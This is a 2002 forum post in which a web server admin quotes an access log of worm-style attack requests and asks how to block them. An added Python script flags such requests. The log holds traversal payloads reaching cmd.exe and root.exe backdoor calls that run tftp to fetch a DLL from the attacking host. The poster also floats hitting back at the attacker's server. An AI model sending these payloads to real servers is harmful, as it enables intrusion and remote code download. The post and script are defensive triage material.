I am getting strange hits to my web server. I don't like it, and I wish to know how to stop them from slipping past my defenses.
I try using ipchains, and most addresses are blocked, but for reasons I can't figure out, this address 65.192.23.150 keeps showing up. I don't understand it: if ipchains and /etc/hosts.deny can't block it, what can? Do I send back a command to shut down their server? How do I get the point across?

65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /scripts/httpodbc.dll HTTP/1.0" 404 307 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 305 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
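An added example, not part of the original post: a triage script for an Apache access log like the one quoted above, which flags requests aimed at Windows/IIS paths and lists any flagged request that was not answered with a 4xx status. The sample lines and the address 192.0.2.10 are constructed, and the names classify and triage are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache common/combined log: host ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
IIS_TARGETS = ("cmd.exe", "root.exe", "httpodbc.dll")  # file names seen in the post's log
OVERLONG = re.compile(r"%c[01]%[0-9a-f]{2}", re.I)  # 0xC0/0xC1 never occur in valid UTF-8

def classify(path):
    """Return the reasons a request path looks like an IIS-targeted probe."""
    reasons, decoded, rounds = set(), path, 0
    for _ in range(3):  # peel nested encoding: %255c -> %5c -> backslash
        step = unquote(decoded)
        if step == decoded:
            break
        decoded, rounds = step, rounds + 1
    if rounds > 1:
        reasons.add("nested-percent-encoding")
    if OVERLONG.search(path):
        reasons.add("overlong-utf8")
    if "../" in decoded or "..\\" in decoded:
        reasons.add("traversal")
    if any(t in decoded.lower() for t in IIS_TARGETS):
        reasons.add("iis-target")
    return reasons

def triage(lines):
    """Count flagged requests per host; collect flagged ones not answered 4xx."""
    flagged, follow_up = defaultdict(int), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host, _method, path, status = m.groups()
        if classify(path):
            flagged[host] += 1
            if not status.startswith("4"):
                follow_up.append((host, path, int(status)))
    return dict(flagged), follow_up

# Constructed sample lines modelled on the post's log (192.0.2.0/24 is a documentation range)
SAMPLE = [
    '192.0.2.10 - - [28/Jul/2002:17:50:05 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"',
    '192.0.2.10 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"',
    '192.0.2.10 - - [28/Jul/2002:18:01:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"',
    '192.0.2.77 - - [28/Jul/2002:18:02:00 -0500] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]
if __name__ == "__main__":
    print(triage(SAMPLE))
```

The second value returned by triage is the list to look at first: flagged requests the server answered with something other than a 4xx.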
